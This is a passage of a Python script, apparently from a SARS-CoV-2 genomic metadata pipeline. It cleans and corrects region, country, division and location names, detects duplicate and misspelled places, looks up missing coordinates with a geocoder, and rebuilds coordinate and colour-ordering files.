ordering_file) as myfile:\n file_content = myfile.readlines()\n\n ordering = {}\n for line in file_content:\n if line == \"\\n\" or line.startswith(\"#\"):\n continue\n l = line.strip().split(\"\\t\")\n type = l[0]\n name = l[1]\n if type not in ordering:\n ordering[type] = []\n ordering[type].append(name)\n\n return ordering\n\n# Read lat_longs into dictionary based on type (e.g. location, division)\ndef read_latlongs(path):\n with open(path + latlongs_file) as myfile:\n file_content = myfile.readlines()\n\n latlongs = {\"location\": {}, \"division\": {}, \"country\": {}, \"region\": {}}\n\n for line in file_content:\n if line == \"\\n\" or line.startswith(\"#\"):\n continue\n l = line.strip().split(\"\\t\")\n type = l[0] # location, division etc.\n name = l[1]\n\n if name not in latlongs[type]:\n latlongs[type][name] = (float(l[2]), float(l[3])) # Store as float to enable sorting by lat_longs\n else:\n print(\"Duplicate in lat_longs? (\" + l[0] + \" \" + l[1] + \")\\n\")\n\n return latlongs\n\n# Read metadata into a multi-level dictionary accessible via data[region][country][division] = list_of_locations\ndef read_metadata(metadata_filename, data, geo_location_occurences, genbank=False):\n\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().split(\"\\t\")\n country_i = header.index(\"country\")\n region_i = header.index(\"region\")\n division_i = header.index(\"division\")\n location_i = header.index(\"location\")\n\n line = f.readline()\n while line:\n l = line.split(\"\\t\")\n country = l[country_i]\n region = l[region_i]\n division = l[division_i]\n location = l[location_i]\n\n # automatically increment genbank locations to the threshold since we\n # don't want to skip any for now.\n increment = 1 if not genbank else 20\n\n geo_location_occurences[\"region\"].update({region: increment})\n geo_location_occurences[\"country\"].update({country: increment})\n geo_location_occurences[\"division\"].update({division: increment})\n geo_location_occurences[\"location\"].update({location: increment})\n\n if region not in data:\n data[region] = {}\n if country not in data[region]:\n data[region][country] = {}\n if division not in data[region][country]:\n data[region][country][division] = []\n if location not in data[region][country][division]:\n data[region][country][division].append(location)\n\n line = f.readline()\n\n return data, geo_location_occurences\n\n# Read metadata again, but this time consider region_exposure, country_exposure and division_exposure (e.g. travel info)\n# In order to be properly displayed, exposure geographies need also be included in color_ordering and lat_longs\n# Only include exposure geography if already specified in accepted exposure file, otherwise print warning\ndef read_exposure(data, metadata_filename, accepted_additions_file):\n # divisions and countries that are accepted additions to the metadata\n accepted_exposure = read_local_file(accepted_additions_file)\n\n # Check given accepted exposures and print warning if already included in the data\n # (e.g. if the country was unknown when the exposure was registered, but had sequences added in the meantime)\n for region in data:\n for country in data[region]:\n if country + \" (\" + region + \")\" in accepted_exposure:\n print(\"Specified exposure \" + bold(country + \" (\" + region + \")\") + \" is no longer needed and can be removed from \" + accepted_additions_file + \".\")\n for division in data[region]:\n if division + \" (\" + country + \", \" + region + \")\" in accepted_exposure:\n print(\"Specified exposure \" + bold(division + \" (\" + country + \", \" + region + \")\") + \" is no longer needed and can be removed from \" + accepted_additions_file + \".\")\n\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().split(\"\\t\")\n region_i = header.index(\"region_exposure\")\n country_i = header.index(\"country_exposure\")\n division_i = header.index(\"division_exposure\")\n epi_i = header.index(\"gisaid_epi_isl\")\n\n line = f.readline()\n while line:\n l = line.split(\"\\t\")\n region = l[region_i]\n country = l[country_i]\n division = l[division_i]\n epi = l[epi_i]\n\n if region not in data:\n print(\"Strain \" + epi + \" has unknown region_exposure \" + bold(region) + \". Please correct!\")\n else:\n s1 = country + \" (\" + region + \")\"\n country_present = True\n if country not in data[region]:\n country_present = False\n if s1 in accepted_exposure or country == region:\n data[region][country] = {}\n country_present = True\n else:\n print(\"Strain \" + epi + \" has unknown country_exposure \" + bold(country) + \". Please correct or consider adding \" + bold(s1) + \" to \" + accepted_additions_file + \"!\")\n if country_present:\n s2 = division + \" (\" + country + \", \" + region + \")\"\n if division not in data[region][country]:\n if s2 in accepted_exposure or division == country:\n data[region][country][division] = [\"\"]\n else:\n print(\"Strain \" + epi + \" has unknown division_exposure \" + bold(division) + \". Please correct or consider adding \" + bold(s2) + \" to \" + accepted_additions_file + \"!\")\n line = f.readline()\n return data\n\n# Given a set of corrections, adjust the data dictionary accordingly\ndef correct_data(data, corrections):\n for (region, country, division, location, region_correct, country_correct, division_correct, location_correct) in corrections:\n if country_correct not in data[region_correct]:\n data[region_correct][country_correct] = {}\n if division_correct not in data[region_correct][country_correct]:\n data[region_correct][country_correct][division_correct] = []\n if location_correct not in data[region_correct][country_correct][division_correct]:\n data[region_correct][country_correct][division_correct].append(location_correct)\n\n # If no entries are contained downstream, assume geography level is now obsolete and delete from the data dictionary\n # (e.g. if a misspelled region is corrected, delete it from data after copying over all downstream countries, divisions and locations)\n data[region][country][division].remove(location)\n if data[region][country][division] == []:\n del data[region][country][division]\n if data[region][country] == {}:\n del data[region][country]\n if data[region] == {}:\n del data[region]\n return data\n\n# Given 3 sets of (region, country, division, location), decide whether the 'given' set corresponds to the\n# 'before' set (considering the wildcard *) and formulate the correction needed to change it to the to 'correct' set\ndef formulate_correction(given, before, correct):\n (region, country, division, location) = given\n (region_before, country_before, division_before, location_before) = before\n (region_correct, country_correct, division_correct, location_correct) = correct\n if region_correct == \"*\":\n region2 = region\n else:\n region2 = region_correct\n\n if country_correct == \"*\":\n country2 = country\n else:\n country2 = country_correct\n\n if division_correct == \"*\":\n division2 = division\n else:\n division2 = division_correct\n\n if location_correct == \"*\":\n location2 = location\n else:\n location2 = location_correct\n\n if (region == region_before or region_before == \"*\") \\\n and (country == country_before or country_before == \"*\") \\\n and (division == division_before or division_before == \"*\") \\\n and (location == location_before or location_before == \"*\"):\n return (region, country, division, location, region2, country2, division2, location2)\n return None\n\n# Given a set of rules, traverse the data dictionary and find and correct cases where rules apply\n# For manualAnnotationRules: Enable different delimiter than '/' in case this is included in a location name\ndef apply_rules(data, ruleSet, delimiter = [\"/\"], print_rules = True):\n rules = read_local_file(ruleSet)\n\n applied_rules = {}\n for g in rules:\n for d in delimiter:\n rules_apply = []\n if d not in g or d not in rules[g]:\n continue\n (region_before, country_before, division_before, location_before) = g.split(d)\n (region_correct, country_correct, division_correct, location_correct) = rules[g].split(d)\n\n # Due to reoccuring bug: Since empty divisions are automatically filled with the country name later in the\n # ncov-ingest pipeline, give a warning when detecting a rule that might be affected\n if country_before == division_before:\n recommended_rule = d.join([region_before, country_before, \"\", \"\"])\n if recommended_rule not in rules:\n print(bold(\"Attention: Consider automatic division filler applied after geoLocationRules (Hint: add [\" + recommended_rule + \"\\t\" + rules[g] + \"])\"))\n\n for region in data:\n for country in data[region]:\n for division in data[region][country]:\n for location in data[region][country][division]:\n correction = formulate_correction((region, country, division, location), (region_before, country_before, division_before, location_before), (region_correct, country_correct, division_correct, location_correct))\n if correction is not None:\n rules_apply.append(correction)\n if print_rules:\n print(\"/\".join(correction[:4]) + \"\\t\" + \"/\".join(correction[4:]))\n applied_rules[correction[:4]] = correction[4:]\n\n data = correct_data(data, rules_apply)\n\n # Also return all rules that were applied to the data to make detection of conflicting annotations easier later\n return data, applied_rules\n\n# Check all locations if the appear as division elsewhere (ignore cases where division == location)\ndef check_division_inconsistency(data):\n for region in data:\n for country in data[region]:\n for division in data[region][country]:\n if division != \"\":\n for location in data[region][country][division]:\n if location != \"\":\n if location in data[region][country] and location != division:\n print(bold(location) + \" found as both division and location within division \" + bold(division) + \".\")\n if list(data[region][country][location]) != [\"\"]: # Locations found below both divisions - needs manual review which division is proper\n print(\"Conflict found: Both divisions contain locations:\")\n l = data[region][country][location]\n if len(l) > 10:\n s = \", \".join(l[:10]) + \"... (plus \" + str(len(l) - 10) + \" more)\"\n else:\n s = \", \".join(l)\n print(\"division \" + bold(location) + \": location(s) \" + s)\n\n l = data[region][country][division]\n if len(l) > 10:\n s = \", \".join(l[:10]) + \"... (plus \" + str(len(l) - 10) + \" more)\"\n else:\n s = \", \".join(l)\n print(\"division \" + bold(division) + \": location(s) \" + s)\n print(\"(Template for correction\" + \"[\" + \"/\".join([region, country, location, \"?\"]) + \"\\t\" + \"/\".join([region, country, division, \"?\"]) + \"])\\n\")\n\n else: # No location found below the affected location/division - change to proper level\n print(\"/\".join([region, country, location, \"\"]) + \"\\t\" + \"/\".join([region, country, division, location]) + \"\\n\")\n\n# Search for duplicates on location and division level\ndef check_duplicates(data, abbreviations_file):\n abbreviations = read_local_file(abbreviations_file)\n\n # Collect all locations and their (region, country, division) origin\n # Cut away all present duplicate specifiers (e.g. 'Guadalupe ES' -> 'Guadalupe') - data is treated as if no\n # duplicate adjustment has happened before. This way, changes in duplicates can be detected and properly treated\n # (e.g. if another duplicate appears in the same country but different division, adjust the duplicate specifier\n # from country abbreviation to division) (e.g. 'Guadalupe ES' -> 'Guadalupe (Extremadura)')\n location_origin = {}\n for region in data:\n if region not in region_order:\n continue\n for country in data[region]:\n if country == region:\n continue\n if country not in abbreviations[\"country\"]:\n print(\"Abbreviation missing for \" + country + \". Please add to \" + abbreviations_file)\n continue\n for division in data[region][country]:\n if country == \"USA\" and division not in abbreviations[\"division\"]:\n print(\"Abbreviation missing for US state \" + division + \". Please add to \" + abbreviations_file)\n continue\n for location in data[region][country][division]:\n if location == \"\":\n continue\n if location.endswith(\" (\" + division + \")\"): # Cut away already existing duplicate specifiers\n location = location.split(\" (\" + division + \")\")[0]\n elif location.endswith(\" \" + abbreviations[\"country\"][country]):\n location = location.split(\" \" + abbreviations[\"country\"][country])[0]\n elif country == \"USA\" and location.endswith(\" \" + abbreviations[\"division\"][division]):\n location = location.split(\" \" + abbreviations[\"division\"][division])[0]\n elif len(location.split(\" \")[-1]) > 1 and location.upper().split(\" \")[-1] == location.split(\" \")[-1] or \"(\" in location:\n # If parentheses or caps found at the end of the location, consider potential invalid duplicate specifier\n if not location.split(\" \")[-1].isnumeric():\n #print(f\"{'/'.join([region, country, division, location])}\\t{'/'.join([region, country, division, location.split(' ')[0]])}\")\n print(\"Potential duplicate inconsistent with current rules: \" + location)\n\n if location not in location_origin:\n location_origin[location] = []\n location_origin[location].append((region, country, division))\n print()\n\n # Filter for duplicates (locations that have more than one (region, country, division) origin set)\n locations_duplicates = {}\n for location in location_origin:\n if len(location_origin[location]) > 1: # more than one (region, country, division) origin\n reduced = []\n countries = []\n for combination in location_origin[location]:\n if combination not in reduced:\n countries.append(combination[1])\n reduced.append(combination)\n # If, after reducing, only one set of (region, country, division) is left, that means there was a location\n # unnecessarily specified as duplicate where the location doesn't exist in any other country/division\n # In that case print out warning that this location needs not be considered as a duplicate anymore and the\n # corresponding geoLocationRules and annotations should be corrected\n if len(reduced) == 1 and countries != [\"USA\"]:\n print(\"Unnecessary duplicate: \" + bold(location) + \"\\n\")\n else:\n # Unless country is USA, then leave these \"unneccessary\" duplicate specifications, as the automatic\n # county assignment already considers duplicates\n locations_duplicates[location] = reduced\n\n # Apply duplicates rules\n for location in locations_duplicates:\n printed_message = []\n divisions = {}\n for (region, country, division) in locations_duplicates[location]:\n if country not in divisions:\n divisions[country] = []\n divisions[country].append(division)\n\n for (region, country, division) in locations_duplicates[location]:\n if country == \"USA\": # For locations in the USA: always use state abbreviation\n location_new = location + \" \" + abbreviations[\"division\"][division]\n if location in data[region][country][division]:\n printed_message.append(\"/\".join([region, country, division, location]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if location + \" (\" + division + \")\" in data[region][country][division]:\n #printed_message.append(\"Please update duplicate \" + bold(location + \" (\" + division + \")\") + \" to \" + bold(location_new) + \" for consistency.\")\n printed_message.append(\"/\".join([region, country, division, location + \" (\" + division + \")\"]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n\n elif len(divisions[country]) == 1: # Among-country duplicate - use country abbreviation\n location_new = location + \" \" + abbreviations[\"country\"][country]\n if location in data[region][country][division]:\n printed_message.append(\"/\".join([region, country, division, location]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if location + \" (\" + division + \")\" in data[region][country][division]:\n #printed_message.append(\"Please update duplicate \" + bold(location + \" (\" + division + \")\") + \" to \" + bold(location_new) + \" for consistency.\")\n printed_message.append(\"/\".join([region, country, division, location + \" (\" + division + \")\"]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n\n else: # Within-country duplicate - use division as unique identifier\n location_new = location + \" (\" + division + \")\"\n if location in data[region][country][division]:\n printed_message.append(\"/\".join([region, country, division, location]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if location + \" \" + abbreviations[\"country\"][country] in data[region][country][division]:\n #printed_message.append(\"Please update duplicate \" + bold(location + \" \" + abbreviations[\"country\"][country]) + \" to \" + bold(location_new) + \" for consistency.\")\n printed_message.append(\"/\".join([region, country, division, location + \" \" + abbreviations[\"country\"][country]]) + \"\\t\" + \"/\".join([region, country, division, location_new]))\n if printed_message != []:\n #print(\"Duplicate found: \" + bold(location))\n for l in printed_message:\n print(l)\n #print()\n\n ### DIVISION ###\n print(\"\\n----------\\n\")\n print(\"Checking for division duplicates...\\n\")\n\n # Collect all divisions and their (region, country) origin\n division_origin = {}\n for region in data:\n if region not in region_order:\n continue\n for country in data[region]:\n if country == region or country not in abbreviations[\"country\"]:\n continue\n for division in data[region][country]:\n if division.endswith(\" \" + abbreviations[\"country\"][country]):\n division = division.split(\" \" + abbreviations[\"country\"][country])[0]\n if division not in division_origin:\n division_origin[division] = []\n # Special cases where a duplicate specification seems out of place for one of the countries (e.g. US states)\n if (division == \"Montana\" or division == \"Maryland\") and country == \"USA\":\n print(\"(Ignoring duplicate division \" + division + \" in favor of the USA.)\")\n elif country == \"Luxembourg\" and division == \"Luxembourg\":\n print(\"(Ignoring duplicate division \" + division + \" in favor of the country Luxembourg.)\")\n else:\n division_origin[division].append((region, country))\n\n # Filter for duplicates\n division_duplicates = {}\n for division in division_origin:\n if len(division_origin[division]) > 1:\n reduced = []\n countries = []\n for combination in division_origin[division]:\n if combination not in reduced:\n countries.append(combination[1])\n reduced.append(combination)\n if len(reduced) == 1:\n print(\"Unnecessary duplicate: \" + bold(division) + \"\\n\")\n else:\n division_duplicates[division] = reduced\n\n print()\n # Apply duplicates rules\n for division in division_duplicates:\n printed_message = []\n\n for (region, country) in division_duplicates[division]:\n division_new = division + \" \" + abbreviations[\"country\"][country]\n if division in data[region][country]:\n printed_message.append(\"/\".join([region, country, division, \"*\"]) + \"\\t\" + \"/\".join([region, country, division_new, \"*\"]))\n\n if printed_message != []:\n print(\"Duplicate found: \" + bold(division))\n for l in printed_message:\n print(l)\n print()\n\n ### COUNTRY ###\n print(\"\\n----------\\n\")\n print(\"Checking for country duplicates...\\n\")\n\n country_origin = {}\n for region in data:\n if region not in region_order:\n continue\n for country in data[region]:\n if country not in country_origin:\n country_origin[country] = []\n country_origin[country].append(region)\n\n for country in country_origin:\n if len(country_origin[country]) > 1:\n print(\"Duplicate country found: \" + bold(country) + \" within \" + bold(\", \".join(country_origin[country])))\n if len(country_origin[country]) == 2:\n print(\"/\".join([country_origin[country][0], country, \"*\", \"*\"]) + \" <-> \" + \"/\".join([country_origin[country][1], country, \"*\", \"*\"]))\n\n return locations_duplicates\n\n# Search for all locations, divisions, countries and regions that are not present in the lat_longs.tsv file\ndef missing_coordinates(data, path, geo_location_occurences):\n missing_latlongs = {\"region\": [], \"country\": {}, \"division\": {}, \"location\": {}}\n\n latlongs = read_latlongs(path)\n\n for region in data:\n if region not in region_order:\n missing_latlongs[\"region\"].append(region)\n\n for country in data[region]:\n if country not in latlongs[\"country\"]:\n if region not in missing_latlongs[\"country\"]:\n missing_latlongs[\"country\"][region] = []\n missing_latlongs[\"country\"][region].append(country)\n\n division_threshold_function = lambda division: division not in latlongs[\"division\"] and (geo_location_occurences[\"division\"][division] >= 20)\n for division in filter(division_threshold_function, data[region][country]):\n if region not in missing_latlongs[\"division\"]:\n missing_latlongs[\"division\"][region] = {}\n if country not in missing_latlongs[\"division\"][region]:\n missing_latlongs[\"division\"][region][country] = []\n missing_latlongs[\"division\"][region][country].append(division)\n\n return missing_latlongs\n\n# Print out missing locations, divisions etc. in a sorted manner\ndef print_missing_places(missing_latlongs):\n ### DIVISION ###\n print(\"\\n----------\\n\")\n if missing_latlongs['division']:\n print(\"Missing divisions:\")\n for region in missing_latlongs[\"division\"]:\n print(\"# \" + region + \" #\")\n for country in missing_latlongs[\"division\"][region]:\n print(country)\n for division in missing_latlongs[\"division\"][region][country]:\n print(\"\\tdivision\\t\" + bold(division))\n print()\n else:\n print(\"No missing divisions\")\n\n ### COUNTRY ###\n print(\"\\n----------\\n\")\n if missing_latlongs['country']:\n print(\"\\nMissing countries:\")\n for region in missing_latlongs[\"country\"]:\n print(\"# \" + region + \" #\")\n for country in missing_latlongs[\"country\"][region]:\n print(\"\\tcountry\\t\" + bold(country))\n else:\n print(\"No missing countries\")\n\n ### REGION ###\n if missing_latlongs['region']:\n print(\"\\n----------\\n\")\n print(\"\\nMissing regions:\")\n for region in missing_latlongs[\"region\"]:\n print(\"\\tregion\\t\" + bold(region))\n\n\n# For all missing place names, search the data for similarly spelled names\n# Always search only within the same ordering level as the missing name, as well as below the same higher-level place\n# (e.g. for a missing location, compare only to locations within the same division)\ndef search_similar_names(data, missing_latlongs, locations_duplicates):\n\n abbreviations = read_local_file(abbreviations_file)\n\n ### DIVISION ###\n print(\"\\n----------\\n\")\n identical = []\n similar = {}\n\n for region in missing_latlongs[\"division\"]:\n for country in missing_latlongs[\"division\"][region]:\n for division in missing_latlongs[\"division\"][region][country]:\n similarity_score = 0\n identical_hit = False\n best_match = None\n\n for division2 in data[region][country]:\n if division2 == division:\n continue\n if clean_string(division) == clean_string(division2): # Identical except for alternative chars\n identical.append(\"/\".join([region, country, bold(division), \"*\"]) + \"\\t\" + \"/\".join([region, country, bold(division2), \"*\"]))\n identical_hit = True\n break\n\n diff = SequenceMatcher(None, division, division2).ratio() # Similarity score if not perfect hit\n if diff > 0.6:\n if diff > similarity_score:\n similarity_score = diff\n best_match = division2\n\n if not identical_hit and best_match is not None:\n while similarity_score in similar:\n similarity_score += 0.000000000000001\n similar[similarity_score] = \"/\".join([region, country, bold(division), \"*\"]) + \"\\t\" + \"/\".join([region, country, bold(best_match), \"*\"])\n\n if identical:\n print(\"Identical divisions:\")\n for l in identical:\n print(l)\n\n if similar:\n print(\"\\nSimilar divisions (sorted by descending similarity):\")\n for l in sorted(similar, reverse=True):\n print(similar[l])\n\n ### COUNTRY ###\n print(\"\\n----------\\n\")\n identical = []\n similar = {}\n\n for region in missing_latlongs[\"country\"]:\n for country in missing_latlongs[\"country\"][region]:\n similarity_score = 0\n identical_hit = False\n best_match = None\n\n for country2 in data[region]:\n if country2 == country:\n continue\n if clean_string(country) == clean_string(country2): # Identical except for alternative chars\n identical.append(\"/\".join([region, bold(country), \"*\", \"*\"]) + \"\\t\" + \"/\".join([region, bold(country2), \"*\", \"*\"]))\n identical_hit = True\n break\n\n diff = SequenceMatcher(None, country, country2).ratio() # Similarity score if not perfect hit\n if diff > 0.6:\n if diff > similarity_score:\n similarity_score = diff\n best_match = country2\n\n if not identical_hit and best_match is not None:\n while similarity_score in similar:\n similarity_score += 0.000000000000001\n similar[similarity_score] = \"/\".join([region, bold(country), \"*\", \"*\"]) + \"\\t\" + \"/\".join([region, bold(best_match), \"*\", \"*\"])\n\n if identical:\n print(\"Identical countries:\")\n for l in identical:\n print(l)\n\n if similar:\n print(\"\\nSimilar countries (sorted by descending similarity):\")\n for l in sorted(similar, reverse=True):\n print(similar[l])\n\n\n ### REGION ###\n print(\"\\n----------\\n\")\n identical = []\n similar = {}\n\n for region in missing_latlongs[\"region\"]:\n similarity_score = 0\n identical_hit = False\n best_match = None\n\n for region2 in data:\n if region2 == region:\n continue\n if clean_string(region) == clean_string(region2): # Identical except for alternative chars\n identical.append(\"/\".join([bold(region), \"*\", \"*\", \"*\"]) + \"\\t\" + \"/\".join([bold(region2), \"*\", \"*\", \"*\"]))\n identical_hit = True\n break\n\n diff = SequenceMatcher(None, region, region2).ratio() # Similarity score if not perfect hit\n if diff > 0.6:\n if diff > similarity_score:\n similarity_score = diff\n best_match = region2\n\n if not identical_hit and best_match is not None:\n while similarity_score in similar:\n similarity_score += 0.000000000000001\n similar[similarity_score] = \"/\".join([bold(region), \"*\", \"*\", \"*\"]) + \"\\t\" + \"/\".join([bold(best_match), \"*\", \"*\", \"*\"])\n\n if identical:\n print(\"Identical regions:\")\n for l in identical:\n print(l)\n\n if similar:\n print(\"\\nSimilar regions (sorted by descending similarity):\")\n for l in sorted(similar, reverse=True):\n print(similar[l])\n\n# Using geoLocator, search for missing coordinates in a supervised manner\n# Automatically add all new coordinates to lat_longs.tsv and store in output folder for manual replacing of the old file\ndef search_missing_latlongs(missing_latlongs):\n geolocator = Nominatim(user_agent=\"hello@nextstrain.org\")\n new_lat_longs = []\n\n for country in missing_latlongs[\"location\"]:\n print(\"# \" + country + \" #\")\n for division in missing_latlongs[\"location\"][country]:\n print(\"\\ndivision: \" + division)\n for location in missing_latlongs[\"location\"][country][division]:\n full_location = location + \", \" + division + \", \" + country\n new_lat_longs.append(find_place(\"location\", location, full_location, geolocator))\n print()\n\n for region in missing_latlongs[\"division\"]:\n for country in missing_latlongs[\"division\"][region]:\n print(\"# \" + country + \" #\")\n for division in missing_latlongs[\"division\"][region][country]:\n full_division = division + \", \" + country\n new_lat_longs.append(find_place(\"division\", division, full_division, geolocator, region))\n print()\n\n for region in missing_latlongs[\"country\"]:\n for country in missing_latlongs[\"country\"][region]:\n new_lat_longs.append(find_place(\"country\", country, country, geolocator))\n\n auto_add_lat_longs(new_lat_longs)\n\n# Suggest geoLocator hits to the user and ask for confirmation or alternative spellings\ndef find_place(geo_level, place, full_place, geolocator, region = \"*\"):\n typed_place = full_place\n redo = True\n tries = 0\n while redo == True:\n if tries < 5:\n try:\n new_place = geolocator.geocode(typed_place, language='en')\n except:\n tries += 1\n continue\n else:\n new_place = None\n tries = 0\n\n if str(new_place) == 'None':\n print(\"\\nCurrent place for missing {}:\\t\".format(geo_level) + full_place)\n print(\"The place as currently written could not be found.\")\n answer = 'n'\n else:\n new_place_string = new_place.address\n full_place_string = full_place\n for level in full_place.split(\", \"):\n if clean_string(level) in clean_string(new_place_string):\n new_place_string = bold(level).join(new_place_string.split(level))\n full_place_string = bold(level).join(full_place_string.split(level))\n for level in new_place.address.split(\", \"):\n if clean_string(level) in clean_string(full_place_string):\n full_place_string = bold(level).join(full_place_string.split(level))\n new_place_string = bold(level).join(new_place_string.split(level))\n\n print(\"\\nCurrent place for missing {}:\\t\".format(geo_level) + full_place_string)\n\n print(\"Geopy suggestion: \"+ new_place_string)\n\n if geo_level != \"division\":\n answer = input('Is this the right place [y/n]? ')\n else:\n answer = input('Is this the right place (a - alter division level) [y/n/a]? ')\n\n if answer.lower() == 'y':\n coordinates = (geo_level + \"\\t\" + place + \"\\t\" + str(new_place.latitude) + \"\\t\" + str(new_place.longitude))\n redo = False\n\n elif geo_level == \"division\" and answer.lower() == \"a\":\n division2 = input(\"Type correct division to produce corrective rule: \")\n (division, country) = full_place.split(\", \")\n print(bold(\"/\".join([region, country, division, \"\"]) + \"\\t\" + \"/\".join([region, country, division2, division])))\n redo = False\n coordinates = (\"location\" + \"\\t\" + place + \"\\t\")\n\n else:\n # Let the user correct/have more detail for what's typed\n print(\"For: \"+full_place)\n typed_place = input(\"Type a more specific place name or 'NA' to leave blank: \")\n if typed_place.lower() == 'na':\n coordinates = (geo_level + \"\\t\" + place + \"\\t\")\n redo = False\n\n #print(coordinates)\n return coordinates\n\n# Add new coordinates to lat_longs.tsv and sort the file before storing in the output folder\ndef auto_add_lat_longs(new_lat_longs):\n with open(\"defaults/lat_longs.tsv\") as f:\n lat_longs_old = f.readlines()\n\n lat_longs = lat_longs_old + [l + \"\\n\" for l in new_lat_longs if len(l.split(\"\\t\")) == 4]\n\n dataset = {\"location\": [], \"division\": [], \"country\": [], \"region\": []}\n for line in lat_longs:\n if line == \"\\n\":\n continue\n dataset[line.split(\"\\t\")[0]].append(line)\n\n lat_longs_sorted = []\n\n regions_list = []\n for type in dataset:\n no_special_char = {clean_string(dataset[type][i].split(\"\\t\")[1]): i for i in range(len(dataset[type]))}\n for line in sorted(no_special_char):\n i = no_special_char[line]\n line_orig = dataset[type][i]\n if line_orig.startswith(\"country\") and line_orig.split(\"\\t\")[1] in region_order:\n regions_list.append(line_orig)\n continue\n lat_longs_sorted.append(line_orig)\n if type == \"country\":\n lat_longs_sorted.append(\"\\n\")\n lat_longs_sorted += regions_list\n lat_longs_sorted.append(\"\\n\")\n\n if lat_longs_sorted != lat_longs_old:\n with open(path_to_output_files + latlongs_file, \"w\") as f:\n for line in lat_longs_sorted:\n f.write(line)\n print(bold(\"\\nNew lat_longs written out to \" + path_to_output_files + latlongs_file + \". Remember to replace the old file in \" + path_to_default_files + \".\"))\n else:\n print(\"No changes to \" + latlongs_file + \".\")\n\n# Given either the new lat_longs file (if new coordinates were added in this iteration of the script) or the old file,\n# Construct the color_ordering.tsv file based on the data dictionary. Only places with existing coordinates are added.\n# Countries and divisions are sorted according to the coordinates, locations are sorted by the alphabet. Regions have\n# a fixed ordering.\ndef build_ordering(data, new_latlongs):\n ordering = read_ordering(path_to_default_files)\n\n if new_latlongs:\n latlongs_path = path_to_output_files\n else:\n latlongs_path = path_to_default_files\n latlongs = read_latlongs(latlongs_path)\n\n # Drop all empty locations\n data_clean = {}\n for region in data:\n data_clean[region] = {}\n for country in data[region]:\n data_clean[region][country] = {}\n for division in data[region][country]:\n data_clean[region][country][division] = []\n for location in data[region][country][division]:\n if location != \"\":\n data_clean[region][country][division].append(location)\n\n with open(path_to_output_files + ordering_file, \"w\") as out:\n for hierarchy in ordering:\n if hierarchy not in [\"region\", \"country\", \"division\", \"location\"]:\n for l in ordering[hierarchy]:\n out.write(hierarchy + \"\\t\" + l + \"\\n\")\n else:\n for region in region_order:\n\n if hierarchy == \"region\":\n out.write(\"region\\t\" + region + \"\\n\")\n else:\n\n out.write(\"\\n# \" + region + \"\\n\")\n for country in sort_by_coordinates(data_clean[region], latlongs[\"country\"]):\n\n if hierarchy == \"country\":\n out.write(\"country\\t\" + country + \"\\n\")\n else:\n\n if hierarchy == \"location\":\n if sum([len(data_clean[region][country][d]) for d in data_clean[region][country]]) > 0: # only write country as a comment if there is data following it\n out.write(\"\\n### \" + country)\n\n if hierarchy == \"division\":\n if len(data_clean[region][country]) > 0:\n out.write(\"\\n### \" + country + \"\\n\")\n\n for division in sort_by_coordinates(data_clean[region][country], latlongs[\"division\"]):\n\n if hierarchy == \"division\":\n out.write(\"division\\t\" + division + \"\\n\")\n continue\n\n if len(data_clean[region][country][division]) > 0: # only write division as a comment if there is data following it\n out.write(\"\\n# \" + division + \"\\n\")\n\n for location in sorted(data_clean[region][country][division]):\n out.write(\"location\\t\" + location + \"\\n\")\n\n if hierarchy == \"location\" or hierarchy == \"division\":\n out.write(\"\\n################\\n\")\n\n out.write(\"\\n################\\n\\n\\n\")\n\n new_ordering = read_ordering(path_to_output_files)\n\n if not new_ordering == ordering:\n print(bold(\"Attention: \" + ordering_file + \" was altered! Remember to replace the old file in \" + path_to_default_files + \".\"))\n else:\n print(\"No changes to \" + ordering_file + \".\")\n\n# Sort a list of divisions or countries by latitude or longitude (whichever has the larger range)\ndef sort_by_coordinates(data, coordinates):\n max_lat = -90\n min_lat = 90\n max_long = -150\n min_long = 150\n for loc in data:\n if loc in coordinates:\n (lat, long) = coordinates[loc]\n max_lat = max(max_lat, lat)\n min_lat = min(min_lat, lat)\n max_long = max(max_long, long)\n min_long = min(min_long, long)\n\n index = 1\n if (max_lat - min_lat) > (max_long - min_long):\n index = 0\n\n loc_per_coord = {}\n for loc in data:\n if loc in coordinates:\n coord = coordinates[loc][index]\n if coordinates[loc][index] in loc_per_coord:\n loc_per_coord[coord].append(loc)\n else:\n loc_per_coord[coord] = [loc]\n sorted_locs = []\n for coord in sorted(loc_per_coord):\n sorted_locs.extend(loc_per_coord[coord])\n return sorted_locs\n\n# Collect all stored annotations in a categorized manner, sorted by topics (e.g. geography-related) and annotation type\n# (e.g. location, division, country...)\ndef read_annotations(annotationsFile, gisaid):\n types = {\"geography\": [\"location\", \"division\", \"country\", \"region\", \"division_exposure\", \"country_exposure\", \"region_exposure\"], \"special\": [\"sampling_strategy\", \"date\", \"host\", \"strain\"], \"paper\": [\"title\", \"paper_url\"]}\n types_inverted = {t:section for section, type in types.items() for t in type}\n annotations = {\"comments\": [], \"geography\": {}, \"special\": {}, \"paper\": {}}\n\n with open(path_to_annotations + annotationsFile) as f:\n line = f.readline()\n while line:\n if line.startswith(\"#\"):\n annotations[\"comments\"].append(line.strip())\n else:\n l = line.strip().split(\"\\t\")\n if line.endswith(\"\\t\\n\"):\n l.append(\"\")\n if gisaid:\n if len(l) != 4:\n print(\"Invalid annotation length (annotation deleted): \" + line.strip())\n line = f.readline()\n continue\n else:\n id = l[0] + \"\\t\" + l[1]\n type = l[2]\n content = l[3]\n else:\n if len(l) != 3:\n print(\"Invalid annotation: \" + line.strip())\n line = f.readline()\n continue\n else:\n id = l[0]\n type = l[1]\n content = l[2]\n if type not in types_inverted:\n print(\"Invalid annotation type (annotation deleted): \" + line.strip())\n else:\n section = types_inverted[type]\n if id not in annotations[section]:\n annotations[section][id] = {}\n if type in annotations[section][id]:\n print(\"Duplicate annotation (first annotation deleted): \" + line.strip() + \" vs. \" + type + \"\\t\" + annotations[section][id][type])\n annotations[section][id][type] = content\n line = f.readline()\n return annotations\n\n# Given applied geoLocationRules and manualAnnotationRules, search the metadata for all affected strains\ndef create_annotations(metadata_filename, applied_rules_geoLocation, applied_rules_manual, gisaid):\n geoLocationAnnotations = {}\n manualAnnotations = {}\n\n with open(path_to_metadata + metadata_filename) as f:\n header = f.readline().split(\"\\t\")\n country_i = header.index(\"country\")\n region_i = header.index(\"region\")\n division_i = 